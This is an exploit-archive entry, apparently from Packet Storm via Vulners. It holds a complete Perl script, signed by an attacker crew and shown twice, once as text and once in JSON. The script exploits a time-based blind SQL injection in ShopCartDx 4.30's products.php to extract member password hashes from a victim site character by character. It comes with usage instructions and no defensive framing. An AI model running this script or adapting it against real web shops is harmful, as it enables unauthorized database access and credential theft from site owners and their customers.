Search...

ShopCartDx 4.30 products.php Blind SQL Injection

2009-07-06T00:00:00

ID PACKETSTORM:78924
Type packetstorm
Reporter Dante90
Modified 2009-07-06T00:00:00

Description

                                        
                                            `#!/usr/bin/perl  
#[0-Day] ShopCartDx &lt;= v4.30 (products.php) Remote Blind SQL Injection  
Exploit  
#Coded By Dante90, WaRWolFz Crew  
#Bug Discovered By: Dante90, WaRWolFz Crew  
  
use strict;  
use LWP::UserAgent;  
  
use HTTP::Request::Common;  
use Time::HiRes;  
use IO::Socket;  
  
my ($Hash,$Time,$Time_Start,$Time_End,$Response);  
my($Start,$End);  
my @chars =  
(48,49,50,51,52,53,54,55,56,57,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122);  
my $Host = "http://www.victime_site.org/path/"; #Insert Victime Web Site  
Link (Example: http://e-topbiz.com/trafficdemos/shopcartdx1/)  
my $Member_ID = shift or &usage;  
my $Method = HTTP::Request-&gt;new(GET =&gt; $Host);  
my $HTTP = new LWP::UserAgent;  
my $Referrer = "http://warwolfz.altervista.org/";  
my $DefaultTime = request($Referrer);  
  
sub Blind_SQL_Jnjection{  
my ($dec,$hex) = @_;  
return "./products.php?cid=-1 OR 1!=(SELECT  
IF((ASCII(SUBSTRING(`password`,${dec},1))=${hex}),benchmark(200000000,CHAR(0)),0)  
FROM `sc_member` WHERE `mid`=${Member_ID})/*";  
}  
  
for(my $I=1; $I&lt;=15; $I++){ #N Hash characters  
for(my $J=0; $J&lt;=62; $J++){ #0-9, A-Z, a-z  
$Time_Start = time();  
$HTTP-&gt;get($Host.Blind_SQL_Jnjection($I,$chars[$J]));  
$Time_End = time();  
$Time = request($Referrer);  
refresh($Host, $DefaultTime, $J, $Hash, $Time, $I);  
if($Time_End - $Time_Start &gt; 6){  
$Time = request($Referrer);  
refresh($Host, $DefaultTime, $J, $Hash, $Time, $I);  
if($Time_End - $Time_Start &gt; 6){  
syswrite(STDOUT,chr($chars[$J]));  
$Hash .= chr($chars[$J]);  
$Time = request($Referrer);  
refresh($Host, $DefaultTime, $J, $Hash, $Time, $I);  
last;  
}  
}  
}  
if($I == 1 && length $Hash &lt; 0 && !$Hash){  
print " * Exploit Failed *\n";  
print " ------------------------------------------------------ \n";  
exit;  
}  
if($I == 15 || length $Hash &lt; $I){  
print " * Exploit Successed *\n";  
print " ------------------------------------------------------\n ";  
system("pause");  
}  
}  
  
sub usage{  
system("cls");  
{  
print " \n [0-Day] ShopCartDx &lt;= v4.30 (products.php) Remote Blind  
SQL Injection Exploit\n";  
print " ------------------------------------------------------ \n";  
print " * USAGE: *\n";  
print " * cd [Local Disk]:\\[Directory Of Exploit]\\ *\n";  
print " * perl name_exploit.pl [uid] *\n";  
print " ------------------------------------------------------ \n";  
print " * Powered By Dante90, WaRWolFz Crew *\n";  
print " * www.warwolfz.org - dante90_founder[at]warwolfz.org *\n";  
print " ------------------------------------------------------ \n";  
};  
exit;  
}  
  
sub request{  
$Referrer = $_[0];  
$Method-&gt;referrer($Referrer);  
$Start = Time::HiRes::time();  
$Response = $HTTP-&gt;request($Method);  
$Response-&gt;is_success() or die "$Host : ", $Response-&gt;message,"\n";  
$End = Time::HiRes::time();  
$Time = $End - $Start;  
return $Time;  
}  
  
sub refresh{  
system("cls");  
{  
print " \n [0-Day] ShopCartDx &lt;= v4.30 (products.php) Remote Blind  
SQL Injection Exploit\n";  
print " ------------------------------------------------------ \n";  
print " * USAGE: *\n";  
print " * cd [Local Disk]:\\[Directory Of Exploit]\\ *\n";  
print " * perl name_exploit.pl [uid] *\n";  
print " ------------------------------------------------------ \n";  
print " * Powered By Dante90, WaRWolFz Crew *\n";  
print " * www.warwolfz.org - dante90_founder[at]warwolfz.org *\n";  
print " ------------------------------------------------------ \n";  
};  
print " * Victime Site: " . $_[0] . "\n";  
print " * Default Time: " . $_[1] . " seconds\n";  
print " * BruteForcing Hash: " . chr($chars[$_[2]]) . "\n";  
print " * BruteForcing N Char Hash: " . $_[5] . "\n";  
print " * SQL Time: " . $_[4] . " seconds\n";  
print " * Password: " . $_[3] . "\n";  
}  
  
#WaRWolFz Crew  
`

JSON Vulners Source

Initial Source

{"id": "PACKETSTORM:78924", "type": "packetstorm", "bulletinFamily": "exploit", "title": "ShopCartDx 4.30 products.php Blind SQL Injection", "description": "", "published": "2009-07-06T00:00:00", "modified": "2009-07-06T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/78924/ShopCartDx-4.30-products.php-Blind-SQL-Injection.html", "reporter": "Dante90", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:21:25", "viewCount": 2, "enchantments": {"score": {"value": 0.4, "vector": "NONE", "modified": "2016-11-03T10:21:25", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-03T10:21:25", "rev": 2}, "vulnersScore": 0.4}, "sourceHref": "https://packetstormsecurity.com/files/download/78924/shopcartdxprod-blindsql.txt", "sourceData": "`#!/usr/bin/perl \n#[0-Day] ShopCartDx <= v4.30 (products.php) Remote Blind SQL Injection \nExploit \n#Coded By Dante90, WaRWolFz Crew \n#Bug Discovered By: Dante90, WaRWolFz Crew \n \nuse strict; \nuse LWP::UserAgent; \n \nuse HTTP::Request::Common; \nuse Time::HiRes; \nuse IO::Socket; \n \nmy ($Hash,$Time,$Time_Start,$Time_End,$Response); \nmy($Start,$End); \nmy @chars = \n(48,49,50,51,52,53,54,55,56,57,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122); \nmy $Host = \"http://www.victime_site.org/path/\"; #Insert Victime Web Site \nLink (Example: http://e-topbiz.com/trafficdemos/shopcartdx1/) \nmy $Member_ID = shift or &usage; \nmy $Method = HTTP::Request->new(GET => $Host); \nmy $HTTP = new LWP::UserAgent; \nmy $Referrer = \"http://warwolfz.altervista.org/\"; \nmy $DefaultTime = request($Referrer); \n \nsub Blind_SQL_Jnjection{ \nmy ($dec,$hex) = @_; \nreturn \"./products.php?cid=-1 OR 1!=(SELECT \nIF((ASCII(SUBSTRING(`password`,${dec},1))=${hex}),benchmark(200000000,CHAR(0)),0) \nFROM `sc_member` WHERE `mid`=${Member_ID})/*\"; \n} \n \nfor(my $I=1; $I<=15; $I++){ #N Hash characters \nfor(my $J=0; $J<=62; $J++){ #0-9, A-Z, a-z \n$Time_Start = time(); \n$HTTP->get($Host.Blind_SQL_Jnjection($I,$chars[$J])); \n$Time_End = time(); \n$Time = request($Referrer); \nrefresh($Host, $DefaultTime, $J, $Hash, $Time, $I); \nif($Time_End - $Time_Start > 6){ \n$Time = request($Referrer); \nrefresh($Host, $DefaultTime, $J, $Hash, $Time, $I); \nif($Time_End - $Time_Start > 6){ \nsyswrite(STDOUT,chr($chars[$J])); \n$Hash .= chr($chars[$J]); \n$Time = request($Referrer); \nrefresh($Host, $DefaultTime, $J, $Hash, $Time, $I); \nlast; \n} \n} \n} \nif($I == 1 && length $Hash < 0 && !$Hash){ \nprint \" * Exploit Failed *\\n\"; \nprint \" ------------------------------------------------------ \\n\"; \nexit; \n} \nif($I == 15 || length $Hash < $I){ \nprint \" * Exploit Successed *\\n\"; \nprint \" ------------------------------------------------------\\n \"; \nsystem(\"pause\"); \n} \n} \n \nsub usage{ \nsystem(\"cls\"); \n{ \nprint \" \\n [0-Day] ShopCartDx <= v4.30 (products.php) Remote Blind \nSQL Injection Exploit\\n\"; \nprint \" ------------------------------------------------------ \\n\"; \nprint \" * USAGE: *\\n\"; \nprint \" * cd [Local Disk]:\\\\[Directory Of Exploit]\\\\ *\\n\"; \nprint \" * perl name_exploit.pl [uid] *\\n\"; \nprint \" ------------------------------------------------------ \\n\"; \nprint \" * Powered By Dante90, WaRWolFz Crew *\\n\"; \nprint \" * www.warwolfz.org - dante90_founder[at]warwolfz.org *\\n\"; \nprint \" ------------------------------------------------------ \\n\"; \n}; \nexit; \n} \n \nsub request{ \n$Referrer = $_[0]; \n$Method->referrer($Referrer); \n$Start = Time::HiRes::time(); \n$Response = $HTTP->request($Method); \n$Response->is_success() or die \"$Host : \", $Response->message,\"\\n\"; \n$End = Time::HiRes::time(); \n$Time = $End - $Start; \nreturn $Time; \n} \n \nsub refresh{ \nsystem(\"cls\"); \n{ \nprint \" \\n [0-Day] ShopCartDx <= v4.30 (products.php) Remote Blind \nSQL Injection Exploit\\n\"; \nprint \" ------------------------------------------------------ \\n\"; \nprint \" * USAGE: *\\n\"; \nprint \" * cd [Local Disk]:\\\\[Directory Of Exploit]\\\\ *\\n\"; \nprint \" * perl name_exploit.pl [uid] *\\n\"; \nprint \" ------------------------------------------------------ \\n\"; \nprint \" * Powered By Dante90, WaRWolFz Crew *\\n\"; \nprint \" * www.warwolfz.org - dante90_founder[at]warwolfz.org *\\n\"; \nprint \" ------------------------------------------------------ \\n\"; \n}; \nprint \" * Victime Site: \" . $_[0] . \"\\n\"; \nprint \" * Default Time: \" . $_[1] . \" seconds\\n\"; \nprint \" * BruteForcing Hash: \" . chr($chars[$_[2]]) . \"\\n\"; \nprint \" * BruteForcing N Char Hash: \" . $_[5] . \"\\n\"; \nprint \" * SQL Time: \" . $_[4] . \" seconds\\n\"; \nprint \" * Password: \" . $_[3] . \"\\n\"; \n} \n \n#WaRWolFz Crew \n`\n", "immutableFields": []}